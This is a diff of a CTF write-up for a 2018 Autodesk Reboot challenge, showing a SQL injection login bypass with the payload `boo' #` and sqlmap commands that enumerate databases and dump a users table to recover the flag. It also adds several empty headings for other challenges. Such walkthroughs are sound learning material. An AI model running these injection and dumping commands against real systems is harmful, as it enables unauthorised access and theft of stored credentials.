nguyenph88/CTF-Writeup/Autodesk Reboot CTF 2 (2018)/writeup.md

 We are provided with an URL: `http://68.183.148.46:8001`

 **Recon:** Upon visiting website, I see there is a simple signin form.
-I check with simple query and could signin.
+I check with simple query `boo' #` for username and could sign in.
 But then there is a message saying that the flag is the password.
 I need to do blind injection anyway and sqlmap is a useful tool for this occasion.

 First, I run sqlmap with simple command:
-`sqlmap -u "http://68.183.148.46:8001/login.php" --data "username=u&password=p" --method POST --dbs`
+> sqlmap -u "http://68.183.148.46:8001/login.php" --data "username=u&password=p" --method POST --dbs

 We got some useful information:

 ![](img/3-injection.png)

-Here is the final query to get the flag:
+You can play around with sqlmap to get all the databases, tables, etc. It takes a while so here is the final query to get the flag:
-`sqlmap -u "http://68.183.148.46:8001/login.php" --data "username=u&password=p"  --method POST -D webapp -T users --dump`
+> sqlmap -u "http://68.183.148.46:8001/login.php" --data "username=u&password=p"  --method POST -D webapp -T users --dump

 ANd here is our flag:
 > flag{h4ck3r5_cr4ck3r5_4nd_5ql_1nj3c710n}

+# Alchemy

+I have no idea about Erl Elixir

+# Notesy

+# Pickleshop

+# apartment

+# xml_is_hard

+# 64 caneries